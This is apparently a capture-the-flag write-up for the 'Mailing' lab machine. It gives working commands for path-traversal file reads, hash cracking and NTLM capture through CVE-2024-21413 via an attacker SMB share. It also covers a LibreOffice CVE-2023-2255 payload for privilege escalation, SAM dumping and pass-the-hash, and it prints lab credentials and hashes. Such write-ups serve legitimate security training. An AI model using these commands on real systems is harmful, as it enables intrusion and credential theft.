Mailing

Mailing

Reconnaissance:

Rust Scan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

Open 10.129.39.59:25
Open 10.129.39.59:80
Open 10.129.39.59:110
Open 10.129.39.59:135
Open 10.129.39.59:143
Open 10.129.39.59:139
Open 10.129.39.59:465
Open 10.129.39.59:445
Open 10.129.39.59:587
Open 10.129.39.59:993
Open 10.129.39.59:5040
Open 10.129.39.59:5985
Open 10.129.39.59:7680
Open 10.129.39.59:47001
Open 10.129.39.59:49664
Open 10.129.39.59:49665
Open 10.129.39.59:49667
Open 10.129.39.59:49666
Open 10.129.39.59:49668
Open 10.129.39.59:55705
[~] Starting Script(s)
[>] Running script "nmap -vvv -p   sC -sV -A" on ip 10.129.39.59
Scanning 10.129.39.59 [20 ports]
Discovered open port 80/tcp on 10.129.39.59
Discovered open port 993/tcp on 10.129.39.59
Discovered open port 135/tcp on 10.129.39.59
Discovered open port 139/tcp on 10.129.39.59
Discovered open port 587/tcp on 10.129.39.59
Discovered open port 7680/tcp on 10.129.39.59
Discovered open port 143/tcp on 10.129.39.59
Discovered open port 110/tcp on 10.129.39.59
Discovered open port 445/tcp on 10.129.39.59
Discovered open port 25/tcp on 10.129.39.59
Discovered open port 465/tcp on 10.129.39.59
Discovered open port 49664/tcp on 10.129.39.59
Discovered open port 47001/tcp on 10.129.39.59
Discovered open port 55705/tcp on 10.129.39.59
Discovered open port 5985/tcp on 10.129.39.59
Discovered open port 49666/tcp on 10.129.39.59
Discovered open port 49668/tcp on 10.129.39.59
Discovered open port 49665/tcp on 10.129.39.59
Discovered open port 5040/tcp on 10.129.39.59
Discovered open port 49667/tcp on 10.129.39.59
Completed SYN Stealth Scan at 08:24, 0.04s elapsed (20 total ports)

PORT      STATE SERVICE       REASON          VERSION
25/tcp    open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
110/tcp   open  pop3          syn-ack ttl 127 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp   open  imap          syn-ack ttl 127 hMailServer imapd
|_imap-capabilities: OK IMAP4rev1 ACL IDLE QUOTA NAMESPACE CHILDREN IMAP4 SORT completed CAPABILITY RIGHTS=texkA0001
445/tcp   open  microsoft-ds? syn-ack ttl 127
465/tcp   open  ssl/smtp      syn-ack ttl 127 hMailServer smtpd
--SNIP--
587/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
--SNIP--
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap      syn-ack ttl 127 hMailServer imapd
--SNIP--
5040/tcp  open  unknown       syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?    syn-ack ttl 127
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55705/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25942/tcp): CLEAN (Timeout)
|   Check 2 (port 53596/tcp): CLEAN (Timeout)
|   Check 3 (port 59027/udp): CLEAN (Timeout)
|   Check 4 (port 48605/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-08-29T13:27:31
|_  start_date: N/A
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

There is a lot of open ports on this box. Some noteworthy highlights are the following ports:

Ports:

  • 25, 110, 143 - SMTP,IMAP and POP3. All mailing server ports. Appears to be some sort of mailing service setup on the box. We can see in our rust scan there is a service running hMailServer.
  • 139, 445 - SMB Ports. There is SMB opened on this box.
  • 80 - There is a website running.

FFUFing:

  • I didnt discover much with fuzzing. Lets see if I can find anything with Wapiti3.

Wapiti3:

  • Running wapiti3 on our target we get an instant hit with `LFI` on the `/downloads` path.

  • Curling down the path gives us proof that it indeed is vulnerable.
curl "http://mailing.htb/download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fservices"
  • We know we have hMailServer installed so lets see if we can find anything in that folder with the LFI

LFI:

curl "http://mailing.htb/download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"
  • Poking around we find a .INI file that contains setup information for the server.
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
  • Appears to be a md5 hash for a AdministratorPassword

841bb5acfa6779ae432fd7a4e6600ba7

  • Save this hash to a file and run hashcat with rockyou.txt word list on it.
 hashcat -m 0 hash /usr/share/wordlists/rockyou.txt 
  • We successfully crack the hash with the password of:

homenetworkingadministrator

  • Attempting to crack the second password 0a9f8ad8bf896b501dde74f08efd7e4c is proving to be more difficult.
  • Im unable to crack it in hashcat but we did find a specific tool just for this case.

hMailServer Pass Cracker

Decrypting the password with this tool gives us 6FC6F69152AD. Though Im not sure what to do with it at this moment.

Port Connections:

  • Now that we have some creds lets see if we can connect to any of these ports with some generic admin/administrator usernames.
telnet boxIP 110
USER administrator@mailing.htb  
PASS homenetworkingadministrator  
LIST  
RETR 1
  • We get some luck with administrator@mailing.htb using the administrator password. But it appears theres nothing in the mailbox.

  • Going back to the website we can see a download instructions button at the bottom of the screen. It leads to a PDF you can download with instructions on how to connect to the mail server.

    http://mailing.htb/download.php?file=instructions.pdf

Thunderbird:

  • Lets follow the instructions and setup thunderbird on our Linux box to connect to the mailbox.

  • Using the found credentials for administrator : homenetworkingadministrator lets sign into the mailbox.

  • We successfully login with this account.

Emailing:

  • Using the instructions PDF we notice at the end we are to email maya@mailing.htb to get a response from them. This is hinting at a responder attack. Lets see where it goes.

  • Email maya@mailing.htb:

    My first email!
    Hi Maya! This is my first mail.
    

  • I waited around for awhile but never got a reply email. I have a sneaking suspicion they want us to setup responder and catch the reply back. Lets see if we can get any hits. We probably need to send a malicious email that will cause Maya to reach back to our server.

CVE-2024-21413:

sudo impacket-smbserver smbFolder $(pwd) -smb2support
  • Then send your email with your SMB share for Maya to reach back out to.
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<boxip>\SMBSHARE' --subject XD
MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d33e6fe5493a6:010100000000000080f2298488b6da015d1dcbb264e2490c0000000002000800530059005500490001001e00570049004e002d005a004f0042005000340036004d0038004b005600410004003400570049004e002d005a004f0042005000340036004d0038004b00560041002e0053005900550049002e004c004f00430041004c000300140053005900550049002e004c004f00430041004c000500140053005900550049002e004c004f00430041004c000700080080f2298488b6da0106000400020000000800300030000000000000000000000000200000c9e5bc0c7d84e948e12cf5d180e24c511c66b448ef8db310790edb6ad72669ff0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00370031000000000000000000:m4y4ngs4ri
  • We capture this NTLM hash from responder.

Evil-WinRm:

  • We managed to dump a NTLM hash cred for maya.

    m4y4ngs4ri

    We can use this to evil-winrm onto the box and get our foothold

evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'
  • Cd to Desktop for the user flag.

  • Exploring around we find an interesting app installed in `Program Files`.

    LibreOffice

  • After running winPEAS and not having much luck seeing any attack vector I was looking for vulnerable applications.

Libre Office:

  • Looking at the `readme` files inside the application we can find out that the version installed is 7.4

CVE-2023-2255:

Libre Office Exploiting:

  • In affected versions of LibreOffice these floating frames fetch and display their linked document without prompt on loading the host document. Essentially you can load remote files without the user being prompted that a file is being loaded.

    We can use this PoC to generate a malicious payload to execute and gain us administrator access.

    https://github.com/elweth-sec/CVE-2023-2255.git

Malicious Payload:

  • Use the PoC to make a bad .odt file that injects the cmd to add maya to local Administradores group.
python3 CVE-2023-2255.py  --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

  • Now that we crafted the payload we need to upload it to the victim. There is a suspicious `Important Documents` directory in `C:\` with nothing inside it. Lets upload it there.

  • Lets check maya’s privileges before hand.

NOTICE: Its not Administrators but Administradores. its in portuguese. If you do Administrators (English) it will not work!

  • After uploading the `.odt file` and waiting for a couple seconds we see maya was added to the Administradores group.

  • Attempting to access localadmin’s profile though we still are denied.

CrackMapExec:

  • Since we have administrator rights to maya lets bust out one of our trusty windows tools crackmapexec.

    We are going to connect to the SMB we discovered in our Recon during initial engagement.

139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds? syn-ack ttl 127
crackmapexec smb mailing.htb -u maya -p "m4y4ngs4ri" --sam

Using this command with the --sam flag allows us to request from the SAM Database and get hash passwords.

The --sam flag requests the SAM database from the target if the credentials are valid and the user has the necessary permissions. This database is a critical part of Windows security, containing hashed passwords and other sensitive information.

  • We successfully dump the localadmin hash. Now we can perform a pass the hash attack and remote into the box with this hash.

localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::

Pass the hash:

impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"

  • Our connection is successful. We are now localadmin on this box.